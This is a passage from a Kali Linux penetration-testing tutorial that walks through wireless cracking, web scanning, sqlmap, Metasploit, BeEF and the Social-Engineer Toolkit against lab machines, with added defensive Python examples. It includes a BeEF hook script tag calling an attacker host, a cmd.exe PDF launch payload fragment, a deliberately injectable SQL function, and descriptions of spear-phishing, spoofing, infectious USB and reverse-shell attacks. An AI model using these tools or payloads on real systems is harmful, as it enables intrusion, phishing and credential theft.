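    <gps-info><avg-lat>40.4168</avg-lat><avg-lon>-3.7038</avg-lon></gps-info>
  </wireless-network>
  <wireless-network number="2" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>None</encryption>
      <essid cloaked="false">CoffeeShop</essid>
    </SSID>
    <BSSID>66:77:88:99:AA:BB</BSSID>
    <channel>11</channel>
    <gps-info><avg-lat>40.4170</avg-lat><avg-lon>-3.7040</avg-lon></gps-info>
  </wireless-network>
  <wireless-network number="3" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WEP</encryption>
      <essid cloaked="true"></essid>
    </SSID>
    <BSSID>CC:DD:EE:FF:00:11</BSSID>
    <channel>1</channel>
  </wireless-network>
</detection-run>
"""


def parse_netxml(text):
    """One dict per <wireless-network>; networks without a GPS fix get lat/lon None."""
    data = text.encode("latin-1") if isinstance(text, str) else text
    rows = []
    for net in ET.fromstring(data).findall("wireless-network"):
        ssid = net.find("SSID")
        essid = ssid.find("essid") if ssid is not None else None
        gps = net.find("gps-info")
        rows.append({
            "bssid": net.findtext("BSSID", "").strip(),
            "essid": (essid.text or "") if essid is not None else "",
            "cloaked": essid is not None and essid.get("cloaked") == "true",
            "channel": int(net.findtext("channel", "0")),
            # Kismet emits one <encryption> element per advertised method.
            "encryption": ",".join((e.text or "") for e in ssid.findall("encryption")) if ssid is not None else "",
            "lat": float(gps.findtext("avg-lat")) if gps is not None and gps.findtext("avg-lat") else None,
            "lon": float(gps.findtext("avg-lon")) if gps is not None and gps.findtext("avg-lon") else None,
        })
    return rows


def load_sqlite(rows, path=":memory:"):
    """Store the networks in SQLite so they can be queried with SQL, as GISKismet does."""
    conn = sqlite3.connect(path)
    conn.execute("""CREATE TABLE IF NOT EXISTS wireless (
        bssid TEXT PRIMARY KEY, essid TEXT, cloaked INTEGER, channel INTEGER,
        encryption TEXT, lat REAL, lon REAL)""")
    conn.executemany(
        "INSERT OR REPLACE INTO wireless VALUES (?, ?, ?, ?, ?, ?, ?)",
        [(r["bssid"], r["essid"], int(r["cloaked"]), r["channel"],
          r["encryption"], r["lat"], r["lon"]) for r in rows])
    conn.commit()
    return conn


def weak_networks(conn):
    """Networks a site survey should flag: open (no encryption) or WEP."""
    return conn.execute(
        "SELECT bssid, essid, encryption FROM wireless "
        "WHERE encryption = 'None' OR encryption LIKE '%WEP%' ORDER BY bssid").fetchall()


def to_kml(conn):
    """Minimal KML (what GISKismet feeds to Google Earth) for every network with a GPS fix."""
    marks = []
    for bssid, essid, enc, lat, lon in conn.execute(
            "SELECT bssid, essid, encryption, lat, lon FROM wireless "
            "WHERE lat IS NOT NULL AND lon IS NOT NULL ORDER BY bssid"):
        name = essid or "(hidden)"
        marks.append(f"<Placemark><name>{name} ({bssid})</name>"
                     f"<description>{enc}</description>"
                     f"<Point><coordinates>{lon},{lat},0</coordinates></Point></Placemark>")
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<kml xmlns="http://www.opengis.net/kml/2.2"><Document>'
            + "".join(marks) + "</Document></kml>")


if __name__ == "__main__":
    db = load_sqlite(parse_netxml(SAMPLE_NETXML))
    print("weak networks:", weak_networks(db))
    print(to_kml(db))
```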



Ghost Phisher
Ghost Phisher is a popular tool that creates fake wireless access points, which can then be
used to stage a Man-in-the-Middle attack.

Step 1: To open it, click Applications -> Wireless Attacks -> “ghost phisher”.

Step 2: After opening it, we will set up the fake AP using the following details.

 Wireless Interface Input: wlan0
 SSID: wireless AP name
 IP address: IP that the AP will have
 WPA: password that clients must supply to connect to this SSID


Step 3: Click the Start button.

Wifite
It is another wireless cracking tool, which attacks multiple WEP, WPA, and WPS encrypted
networks in a row.

Firstly, the wireless card has to be in the monitoring mode.

Step 1: To open it, go to Applications ->Wireless Attack -> Wifite.


Step 2: Type "wifite --showb" to scan for the networks.


Step 3: To stop scanning and start attacking the wireless networks, press Ctrl + C.


Step 4: Type “1” to crack the first wireless network.

Step 5: After attacking is complete, the key will be found.

5. Kali Linux ─ Website Penetration Testing

In this chapter, we will learn about website penetration testing offered by Kali Linux.

Vega Usage
Vega is a free and open source scanner and testing platform to test the security of web
applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting
(XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written
in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical
inspection. Vega can be extended using a powerful API in the language of the web:
JavaScript. The official webpage is https://subgraph.com/vega/


Step 1: To open Vega, go to Applications -> 03-Web Application Analysis -> Vega.



Step 2: If you don’t see an application in the path, type the following command.

root@kali:~# apt-get update && apt-get install -y vega
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
0% [Connecting to http.kali.org]


Step 3: To start a scan, click “+” sign.


Step 4: Enter the URL of the web application to be scanned. In this case, it is the
Metasploitable machine -> click “Next”.


Step 5: Check the boxes of all the scanner modules you want to run. Then, click “Next”.


Step 6: Click “Next” again in the following screenshot.


Step 7: Click “Finish”.



Step 8: If the following dialog pops up, click “Yes”.

Follow Redirect?

Target address http://192.168.1.101/dvwa redirects to address http://192.168.1.101/dvwa/login.php

Would you like to add http://192.168.1.101/dvwa/login.php to the scope?

No | Yes

The scan will continue as shown in the following screenshot.


Step 9: After the scan is completed, the lower-left panel lists all the findings,
categorized by severity. If you click one, the right panel shows the details of
the vulnerability: “Request”, “Discussion”, “Impact”, and “Remediation”.

Scan Alerts panel (the finding selected in the screenshot):

REQUEST: http://192.168.1.101/dvwa/login.php (10/22/2016 15:54:02)

DISCUSSION: Vega detected a form with a password input field that submits to an insecure (HTTP) target. Password values should not be sent in the clear across insecure channels. This vulnerability could result in disclosure of passwords to network attackers.

IMPACT: Vega has detected a form that submits a password over an insecure channel. This could result in disclosure of passwords to network eavesdroppers.

REMEDIATION: Passwords should not be sent unencrypted. The form should submit to an HTTPS ...

ZapProxy
ZAP (OWASP Zed Attack Proxy) is an easy-to-use integrated penetration testing tool for
finding vulnerabilities in web applications. It is written in Java and has a Java GUI.

Step 1: To open ZapProxy, go to Applications -> 03-Web Application Analysis -> owasp-
zap.

Step 2: Click “Accept”.


ZAP will start to load.

INFO: loaded filter Replace HTTP response body using defined pattern.
INFO: loaded filter Replace HTTP response header using defined pattern.
INFO: loaded filter Send ZAP session request ID

Step 3: Choose one of the session options shown in the following screenshot and click “Start”.

The following web application is Metasploitable, with IP 192.168.1.101.


Step 4: Enter the URL of the web application under test in “URL to attack” -> click “Attack”.


In the left panel “Alerts”, you will see all the findings along with the description.


Step 5: Click “Spider” and you will see all the links scanned.

Database Tools Usage

sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.

Let’s learn how to use sqlmap.


Step 1: To open sqlmap, go to Applications -> 04-Database Assessment -> sqlmap.

The web page with parameters vulnerable to SQL Injection is on the Metasploitable machine.



Step 2: To start the SQL injection testing, type “sqlmap -u URL of victim”.

root@kali:~# sqlmap -u http://192.168.1.101/mutillidae/index.php?page=user-info.php

Step 3: From the results, you will see that some parameters are vulnerable.
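What sqlmap is detecting, as an added example that is not part of the tutorial or of Mutillidae: a constructed stand-in for the user-info lookup, in its vulnerable string-concatenation form beside the parameterized fix, with a probe that classifies the outcome the way a scanner does (syntax error leaked, rows returned, or nothing). Table and rows are constructed; the real app uses MySQL, SQLite is used here so it runs offline.

```python
import sqlite3


def make_db():
    """Constructed accounts table; passwords kept in plaintext only to mirror the demo app."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [
        ("admin", "adminpass", "g0t r00t?"),
        ("adrian", "somepassword", "Zombie Films Rock!"),
    ])
    return conn


def user_info_vulnerable(conn, username, password):
    """The defect sqlmap probes for: user input pasted straight into the query text."""
    sql = ("SELECT username, signature FROM accounts WHERE username = '"
           + username + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def user_info_safe(conn, username, password):
    """Parameter binding: the input is data and never becomes part of the SQL grammar."""
    return conn.execute(
        "SELECT username, signature FROM accounts WHERE username = ? AND password = ?",
        (username, password)).fetchall()


def probe(conn, lookup, username, password):
    """Run one lookup and report the outcome a scanner would classify:
    ('error', message) when the database complains about the syntax (what the
    "You have an error in your SQL syntax" page above shows), else ('rows', result)."""
    try:
        rows = lookup(conn, username, password)
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("rows", rows)


if __name__ == "__main__":
    db = make_db()
    # A single quote is the first thing an injection scanner sends: the vulnerable
    # query breaks, the parameterized one simply finds no such user.
    print("vulnerable:", probe(db, user_info_vulnerable, "admin'", "x"))
    print("safe:      ", probe(db, user_info_safe, "admin'", "x"))
```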

sqlninja
sqlninja turns a SQL Injection in a web application backed by Microsoft SQL Server into
full (even GUI) access to that server. It is a tool targeted at exploiting SQL Injection
vulnerabilities on web applications that use Microsoft SQL Server as their back-end.
Full information regarding this tool can be found on http://sqlninja.sourceforge.net/

Step 1: To open sqlninja, go to Applications -> 04-Database Assessment -> sqlninja.


CMS Scanning Tools

WPScan
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote
WordPress installations to find security issues.

Step 1: To open WPscan go to Applications -> 03-Web Application Analysis -> “wpscan”.

The following screenshot pops up.


Step 2: To scan a website for vulnerabilities, type “wpscan -u URL of webpage”.

If the scanner's database is not up to date, it will ask you to update it. I recommend doing so.

Once the scan starts, you will see the findings. In the following screenshot, vulnerabilities
are indicated by a red arrow.


Joomscan
Joomla is probably the most widely-used CMS out there due to its flexibility. Joomscan is
a scanner for this CMS. It helps web developers and web masters identify possible
security weaknesses on their deployed Joomla sites.

Step 1: To open it, open a terminal from the left panel and type “joomscan
-parameter”.

Step 2: To get help for the usage type “joomscan /?”

root@kali:~# joomscan /?

Step 3: To start the scan, type “joomscan -u URL of the victim”.


Results will be displayed as shown in the following screenshot.

SSL Scanning Tools

TLSSLed
TLSSLed is a Linux shell script used to evaluate the security of a target SSL/TLS (HTTPS)
web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is
based on the openssl library, and on the “openssl s_client” command line tool.


The current tests include checking if the target supports the SSLv2 protocol, the NULL
cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong
ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS
renegotiation capabilities.

To start testing, open a terminal and type “tlssled URL port“. It will begin testing the
server's certificate and SSL/TLS configuration.


You can see from the finding that the certificate is valid until 2018 as shown in green in
the following screenshot.

[.] Testing for the certificate CA issuer ...

    Issuer: COMODO RSA Domain Validation Secure Server CA

[.] Testing for the certificate validity period ...

    Today: Sat Oct 22 19:27:24 UTC 2016
    Not valid before:
    Not valid after:

[.] Checking preferred server ciphers ...

[*] Testing for SSL/TLS renegotiation MitM vuln. (CVE-2009-3555)

[+] Testing for secure renegotiation support (RFC 5746) ...

    Secure Renegotiation IS NOT supported

[+] Testing for SSL/TLS renegotiation DoS vuln. (CVE-2011-1473)

[.] Testing for client initiated (CI) SSL/TLS renegotiation (insecure) ...
    UNKNOWN

[.] Testing for client authentication using digital certificates ...
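The checks TLSSLed describes (SSLv2, NULL and 40/56-bit ciphers, strong AES ciphers, MD5-signed certificate, validity period, secure renegotiation) applied offline to scan results, as an added example that is not TLSSLed's or sslscan's own code. The scan values below are constructed; in a real run they would be read from the sslscan / openssl s_client output.

```python
from datetime import datetime, timezone

# Constructed stand-in for what sslscan / "openssl s_client" report for one server.
SCAN_DATE = datetime(2016, 10, 22, 19, 27, 24, tzinfo=timezone.utc)   # "Today" in the run above
SAMPLE_SCAN = {
    "sslv2": True,
    "ciphers": ["NULL-MD5", "EXP-RC4-MD5", "DES-CBC-SHA", "DES-CBC3-SHA",
                "AES256-SHA", "ECDHE-RSA-AES128-GCM-SHA256", "RC4-SHA"],
    "not_before": datetime(2015, 10, 1, tzinfo=timezone.utc),
    "not_after": datetime(2018, 10, 1, tzinfo=timezone.utc),    # "valid until 2018"
    "sig_alg": "sha256WithRSAEncryption",
    "secure_renegotiation": False,                               # as in the output above
}


def classify_cipher(name):
    """Apply the key-length rules TLSSLed uses to one OpenSSL cipher-suite name."""
    n = name.upper()
    if "NULL" in n:                                   # no encryption at all
        return "null"
    if n.startswith("EXP"):                           # export grade: 40-bit (EXP-) or 56-bit (EXP1024-)
        return "weak"
    if "DES-CBC-" in n and "CBC3" not in n and "3DES" not in n:   # single DES, 56-bit key
        return "weak"
    if "AES" in n:                                    # the strong cipher the text names
        return "strong"
    return "other"


def audit_ciphers(ciphers):
    """Bucket a server's accepted cipher list: null / weak / strong / other."""
    buckets = {"null": [], "weak": [], "strong": [], "other": []}
    for c in ciphers:
        buckets[classify_cipher(c)].append(c)
    return buckets


def audit_certificate(not_before, not_after, sig_alg, today=None):
    """The certificate checks from the script: validity window and MD5 signature."""
    today = today or datetime.now(timezone.utc)
    findings = []
    if today < not_before:
        findings.append("certificate not yet valid")
    if today > not_after:
        findings.append("certificate expired")
    if "md5" in sig_alg.lower():
        findings.append("certificate is MD5-signed")
    return findings


def tlssled_style_report(scan, today=None):
    """Combine the checks into the list of issues a run would print."""
    issues = []
    if scan.get("sslv2"):
        issues.append("SSLv2 supported")
    b = audit_ciphers(scan["ciphers"])
    if b["null"]:
        issues.append("NULL cipher accepted: " + ", ".join(b["null"]))
    if b["weak"]:
        issues.append("40/56-bit ciphers accepted: " + ", ".join(b["weak"]))
    if not b["strong"]:
        issues.append("no strong (AES) cipher offered")
    issues += audit_certificate(scan["not_before"], scan["not_after"], scan["sig_alg"], today)
    if not scan.get("secure_renegotiation", True):
        issues.append("secure renegotiation (RFC 5746) NOT supported")
    return issues


if __name__ == "__main__":
    for line in tlssled_style_report(SAMPLE_SCAN, SCAN_DATE):
        print("[!]", line)
```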


w3af
w3af is a Web Application Attack and Audit Framework which aims to identify and exploit
all web application vulnerabilities. This package provides a Graphical User Interface (GUI)
for the framework. If you want a command-line application only, install w3af-console.

The framework has been called the “metasploit for the web”, but it’s actually much more
as it also discovers the web application vulnerabilities using black-box scanning
techniques. The w3af core and its plugins are fully written in Python. The project has more
than 130 plugins, which identify and exploit SQL injection, cross-site scripting (XSS),
remote file inclusion and more.

Step 1: To open it, go to Applications -> 03-Web Application Analysis -> Click w3af.

Step 2: On the “Target” enter the URL of victim which in this case will be metasploitable
web address.

Step 3: Select the profile -> Click “Start”.



Step 4: Go to “Results” and you can see the finding with the details.
6. Kali Linux ─ Exploitation Tools

In this chapter, we will learn about the various exploitation tools offered by Kali Linux.

Metasploit
As we mentioned before, Metasploit is a product of Rapid7 and most of the resources can
be found on their web page https://www.metasploit.com. It is available in two versions -
a commercial and a free edition. The differences between the two are small, so in this
case we will be using the Community version (free).

As an Ethical Hacker, you will be using the Kali distribution, which has the Metasploit
Community version embedded along with other ethical hacking tools, which saves installation
time. However, if you want to install it as a separate tool, it is an application that can
be installed on operating systems like Linux, Windows and OS X.

First, open the Metasploit console in Kali: go to Applications -> Exploitation Tools ->
Metasploit.

After it starts, you will see the following screen, where the version of Metasploit is
underlined in red.


In the console, typing help or ? shows a list of the MSF commands along with their
descriptions. You can choose based on your needs and what you will use.


Another important administration command is msfupdate, which updates Metasploit with
the latest vulnerability exploits. After running this command in the console, you will
have to wait several minutes until the update is complete.

It has a useful command called “search” which you can use to find what you want, as shown
in the following screenshot. For example, to find exploits related to Microsoft, the
command is msf > search name:Microsoft type:exploit.

Where “search” is the command, ”name” is the name of the object that we are looking for,
and “type” is what kind of script we are looking for.


Another command is “info”. It provides the information regarding a module or platform
where it is used, who the author is, vulnerability references, and the payload restrictions
that it can have.

Armitage
Armitage GUI for metasploit is a complement tool for metasploit. It visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features.

Let’s open it. The Metasploit console must already be open and started. To open
Armitage, go to Applications -> Exploit Tools -> Armitage.


Click the Connect button, as shown in the following screenshot.

When it opens, you will see the following screen.



Armitage is user friendly. The area “Targets” lists all the machines that you have
discovered and are working with; compromised targets are shown in red with a
thunderstorm icon on them.


After you have hacked the target, you can right-click on it and continue exploring with
what you need to do such as exploring (browsing) the folders.


In the following GUI, you will see the folder view, which is called the console. Just by
clicking the folders, you can navigate through them without needing Metasploit
commands.

On the right side of the GUI, is a section where the modules of vulnerabilities are listed.

auxiliary
  admin
    http
      tomcat_administration
      tomcat_utf8_traversal
  scanner
    http
      tomcat_enum
      tomcat_mgr_login
exploit
  multi
    http
      tomcat_mgr_deploy

Modules

BeEF
BeEF stands for Browser Exploitation Framework. It is a penetration testing tool that
focuses on the web browser. BeEF allows the professional penetration tester to assess the
actual security posture of a target environment using client-side attack vectors.

First, you have to update the Kali package using the following commands:

root@kali:/# apt-get update

root@kali:/# apt-get install beef-xss


To start, use the following command:

root@kali:/# cd /usr/share/beef-xss

root@kali:/usr/share/beef-xss# ./beef

Open the browser and enter the username and password: beef.


The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run in client
browsers. When it does, it calls back to the BeEF server, communicating a lot of information
about the target. It also allows additional commands and modules to be run against the
target. In this example, the location of the BeEF hook is
http://192.168.1.101:3000/hook.js.


In order to attack a browser, include the JavaScript hook in a page that the client will view.
There are a number of ways to do that, however the easiest is to insert the following into
a page and somehow get the client to open it.

<script src="http://192.168.1.101:3000/hook.js"
type="text/javascript"></script>

Once the page loads, go back to the BeEF Control Panel and click “Online Browsers” on
the top left. After a few seconds, you should see your IP address pop-up representing a
hooked browser. Hovering over the IP will quickly provide information such as the browser
version, operating system, and what plugins are installed.

To remotely run the command, click the “Owned” host. Then, on the command click the
module that you want to execute, and finally click “Execute”.
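Seen from the defending side, as an added example that is neither BeEF's nor Vega's code: a small HTML audit that flags both findings this chapter has shown, a login form with a password field that submits over plain HTTP (the Vega alert) and a script tag pulling JavaScript from a host that is not the site's own (the injected hook above), plus the Content-Security-Policy value that would stop the latter. The page below and the allowed-host list are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed page: a login form posting over plain HTTP and an injected hook script
# loaded from a host (and port) that is not the site's own.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
</head><body>
<form action="login.php" method="post">
  <input name="username"><input type="password" name="password">
</form>
<form action="https://intranet.example/search" method="get"><input name="q"></form>
</body></html>"""


class PageAudit(HTMLParser):
    """Collects script sources and forms (action plus whether they hold a password field)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.forms = []          # dicts: {"action": str, "password": bool}

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "form":
            self.forms.append({"action": a.get("action", ""), "password": False})
        elif tag == "input" and a.get("type", "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True


def audit(html, page_url, allowed_script_hosts=()):
    """Findings as (kind, value): password forms over HTTP and scripts from foreign hosts.
    The host is compared including the port, so 192.168.1.101:3000 is foreign even on a
    page served from 192.168.1.101."""
    p = PageAudit()
    p.feed(html)
    allowed = {urlparse(page_url).netloc.lower()} | {h.lower() for h in allowed_script_hosts}
    findings = []
    for f in p.forms:
        if f["password"]:
            target = urljoin(page_url, f["action"])   # a relative action inherits the page scheme
            if urlparse(target).scheme != "https":
                findings.append(("password-over-http", target))
    for src in p.scripts:
        host = urlparse(urljoin(page_url, src)).netloc.lower()
        if host not in allowed:
            findings.append(("foreign-script", src))
    return findings


def csp_header(allowed_script_hosts=()):
    """Content-Security-Policy value that lets the browser refuse scripts from other hosts."""
    return "script-src " + " ".join(["'self'", *allowed_script_hosts])


if __name__ == "__main__":
    page = "http://192.168.1.101/dvwa/login.php"
    for kind, value in audit(SAMPLE_HTML, page, allowed_script_hosts=("cdn.example.net",)):
        print(f"{kind}: {value}")
    print("Content-Security-Policy:", csp_header(("cdn.example.net",)))
```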


Linux Exploit Suggester
It suggests possible exploits given the release version (‘uname -r’) of the Linux Operating
System.

To run it, type the following command:

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 is the kernel version of Linux OS that we want to exploit.

7. Kali Linux ─ Forensics Tools

In this chapter, we will learn about the forensics tools available in Kali Linux.

p0f
p0f is a tool that can identify the operating system of a target host simply by examining
captured packets even when the device in question is behind a packet firewall. P0f does
not generate any additional network traffic, direct or indirect; no name lookups; no
mysterious probes; no ARIN queries; nothing. In the hands of advanced users, P0f can
detect firewall presence, NAT use, and existence of load balancers.

Type “p0f -h” in the terminal to see how to use it and you will get the following results.

p0f: Invalid option -- 'h'

Usage: p0f [ ...options... ] [ 'filter rule' ]

Network interface options:

  -i iface   listen on the specified network interface
  -r file    read offline pcap data from a given file
  -p         put the listening interface in promiscuous mode
  -L         list all available interfaces

Operating mode and output settings:

  -f file    read fingerprint database from 'file' (p0f.fp)
  -o file    write information to the specified log file
  -s name    answer to API queries at a named unix socket
  -u user    switch to the specified unprivileged account and chroot
  -d         fork into background (requires -o or -s)


It can also list the available interfaces.

-- Available interfaces --

0: Name        : eth0
   Description : -
   IP address  : 192.168.1.

1: Name        : nflog
   Description : Linux netfilter log (NFLOG) interface
   IP address  : (none)

2: Name        : any
   Description : Pseudo-device that captures on all interfaces
   IP address  : (none)

3: Name        : lo
   Description : -
   IP address  : 127.0.0.1

Then, type the following command: “p0f -i eth0 -p -o filename”.

Where the parameter "-i" is the interface name as shown above. "-p" means it is in
promiscuous mode. "-o" means the output will be saved in a file.

root@kali:~# p0f -i eth0 -p -o /root/Desktop/my.log

Open a webpage with the address 192.168.1.2


From the results, you can observe that the web server is running Apache 2.x and the OS is
Debian.

pdf-parser
pdf-parser is a tool that parses a PDF document to identify the fundamental elements used
in the analyzed pdf file. It will not render a PDF document. It is not a textbook PDF
parser, but it gets the job done. Generally, it is used on pdf files that you suspect have
a script embedded in them.


The command is:

pdf-parser -o 10 filepath

where "-o" is the number of objects.

As you can see in the following screenshot, the PDF file launches a CMD command (a
/Launch action whose /F is cmd.exe):

/F (cmd.exe)
/D (c:\\\\windows\\\\system32)
/P (/c %HOMEDRIVE%&cd %HOMEPATH%& ... &(start template.pdf) ...)
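The kind of object pdf-parser surfaced above can be triaged automatically. The following scanner is an added example, not part of the tutorial or of pdf-parser: it walks the indirect objects of a PDF, flags the keys that make a document act on its own (/OpenAction, /AA, /JavaScript, /Launch, ...), decodes the #xx name escapes attackers use to hide those keys, and extracts the program and parameters of a /Launch action. The sample PDF bytes are constructed for the example.

```python
import re

# Constructed sample PDF (example data, not from the tutorial): the catalog's
# /OpenAction points at object 10, a /Launch action that runs cmd.exe, which
# is the shape of the object pdf-parser surfaced above.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 10 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
10 0 obj
<< /Type /Action /S /Launch /F (cmd.exe) /D (c:\\\\windows\\\\system32)
   /P (/c echo example) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Keys that make a PDF act on its own or carry executable content.
RISKY_KEYS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
              b"/EmbeddedFile", b"/RichMedia")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)


def iter_objects(data):
    """Yield (object number, body bytes) for each indirect object."""
    for m in OBJ_RE.finditer(data):
        yield int(m.group(1)), m.group(3)


def normalise(body):
    """Decode #xx hex escapes in names: /Lau#6ech is the same name as /Launch,
    and obfuscated documents use this to hide keywords from naive scanners."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), body)


def find_suspicious_objects(data):
    """Return {object number: [risky keys found]} over the whole file."""
    findings = {}
    for num, body in iter_objects(data):
        norm = normalise(body)
        hits = [k.decode() for k in RISKY_KEYS
                if re.search(rb"(?<![A-Za-z])" + re.escape(k) + rb"(?![A-Za-z])", norm)]
        if hits:
            findings[num] = hits
    return findings


def launch_target(data, obj_number):
    """For a /Launch action object, return (program, parameters); None otherwise."""
    for num, body in iter_objects(data):
        if num != obj_number:
            continue
        norm = normalise(body)
        if b"/Launch" not in norm:
            return None
        prog = re.search(rb"/F\s*\(([^)]*)\)", norm)
        params = re.search(rb"/P\s*\(((?:[^()\\]|\\.)*)\)", norm)
        return (prog.group(1).decode(errors="replace") if prog else "",
                params.group(1).decode(errors="replace") if params else "")
    return None


if __name__ == "__main__":
    for num, keys in find_suspicious_objects(SAMPLE_PDF).items():
        print(f"object {num}: {', '.join(keys)}")
        if "/Launch" in keys:
            print("  launches:", launch_target(SAMPLE_PDF, num))
```

Real documents often hide such objects inside compressed object streams, so in practice decompress those (pdf-parser does this for you) before running the same matching.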

Dumpzilla
Dumpzilla is developed in Python 3.x and its purpose is to extract all forensically
interesting information from the Firefox, Iceweasel, and SeaMonkey browsers so that it can
be analyzed.

ddrescue
It copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to
rescue the good parts first in case of read errors.

The basic operation of ddrescue is fully automatic. That is, you don't have to wait for an
error, stop the program, restart it from a new position, etc.

If you use the mapfile feature of ddrescue, the data is rescued very efficiently (only the
needed blocks are read). Also, you can interrupt the rescue at any time and resume it
later at the same point. The mapfile is an essential part of ddrescue's effectiveness. Use
it unless you know what you are doing.

The command line is:

dd_rescue infilepath outfilepath

The parameter “-v” means verbose. “/dev/sdb” is the device to be rescued. The img file is
the recovered image.


DFF
It is another forensic tool used to recover files. It has a GUI too. To open it, type
“dff-gui” in the terminal and the following GUI will open.

[Screenshot: Digital Forensics Framework main window. Menu: File, Edit, Module, View, IDE.
Toolbar: Open evidence, Open device, Browser, Console, Live scripting, IDE. Left tree:
Local devices, Logical files, Modules root, Bookmarks. Bottom panel: Task Manager, Output,
Errors, Modules, Preview.]


Click File -> “Open Evidence”.



The following table will open. Check “Raw format” and click “+” to select the folder that
you want to recover.


Then, you can browse the files on the left of the pane to see what has been recovered.
8. Kali Linux ─ Social Engineering

In this chapter, we will learn about the social engineering tools used in Kali Linux.

Social Engineering Toolkit Usage

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework
designed for social engineering. SET has a number of custom attack vectors that allow you
to make a believable attack in a fraction of the time. These kinds of tools exploit human
behavior to draw people into the attack vectors.

Let’s learn how to use the Social Engineer Toolkit.

Step 1: To open SET, go to Applications -> Social Engineering Tools -> Click “SET” Social
Engineering Tool.


Step 2: It will ask if you agree with the terms of usage. Type “y” as shown in the following
screenshot.


Step 3: Most of the menus shown in the following screenshot are self-explanatory; among
them the most important is number 1, “Social Engineering Attacks”.


Step 4: Type “1” -> Enter. A submenu will open. If you press the Enter button again,
you will see the explanations for each submenu.

The Spear-phishing module allows you to specially craft email messages and send them
to your targeted victims with attached FileFormat malicious payloads. For example,
sending a malicious PDF document which, if the victim opens it, will compromise the system.
If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install
sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options for the spear phishing attack:

 Perform a Mass Email Attack
 Create a FileFormat Payload and a Social-Engineering Template

The first option lets SET do everything for you (option 1); the second lets you create
your own FileFormat payload and use it in your own attack.


Type “99” to go back to the main menu and then type “2” to go to “The web attack
vectors”.

The web attack module is a unique way of utilizing multiple web-based attacks in order to
compromise the intended victim. This module works by performing phishing attacks against
the victim, who must click the link. There is a wide variety of attacks that can occur once
they click a link.


Type “99” to return to the main menu and then type “3”.

The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit
payload. The payload and autorun file are burned or copied onto a USB. When the DVD/USB/CD
is inserted in the victim’s machine, it will trigger the autorun feature (if autorun is enabled)
and hopefully compromise the system. You can pick the attack vector you wish to use:
fileformat bugs or a straight executable.

Following are the options for Infectious Media Generator.

 File-Format Exploits
 Standard Metasploit Executable

Type “99” to go back to the main menu. Then, type “4” to go to “Create a Payload and Listener”.


The create payload and listener is a simple way to create a Metasploit payload. It will
export the exe file for you and generate a listener. You would need to convince the victim
to download the exe file and execute it to get the shell.

Type “99” to go back to the main menu and then type “5” to go to “Mass Mailer Attack”.

The mass mailer attack will allow you to send multiple emails to victims and customize the
messages. There are two options on the mass e-mailer; the first is to send an email to a
single email address. The second option allows you to import a list that has all recipient
emails and it will send your message to as many people as you want within that list.

 E-Mail Attack Single Email Address
 E-Mail Attack Mass Mailer


Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack
Vector”.

> 9

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu

The Powershell Attack Vector module allows you to create PowerShell specific attacks.
These attacks allow you to use PowerShell, which is available by default in all operating
systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying
payloads and performing functions that do not get triggered by preventive technologies.

 Powershell Alphanumeric Shellcode Injector
 Powershell Reverse Shell
 Powershell Bind Shell
 Powershell Dump SAM Database

9. Kali Linux ─ Stressing Tools

Stressing tools are used to create DoS attacks or to stress test different applications,
so as to take appropriate measures for the future.

All the Stress testing tools are found in Applications -> 02-Vulnerability Analysis -> Stress
testing.

All stress tests will be run against the Metasploitable machine, which has the IP 192.168.1.102.

msfadmin@metasploitable:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:0c:e3:be
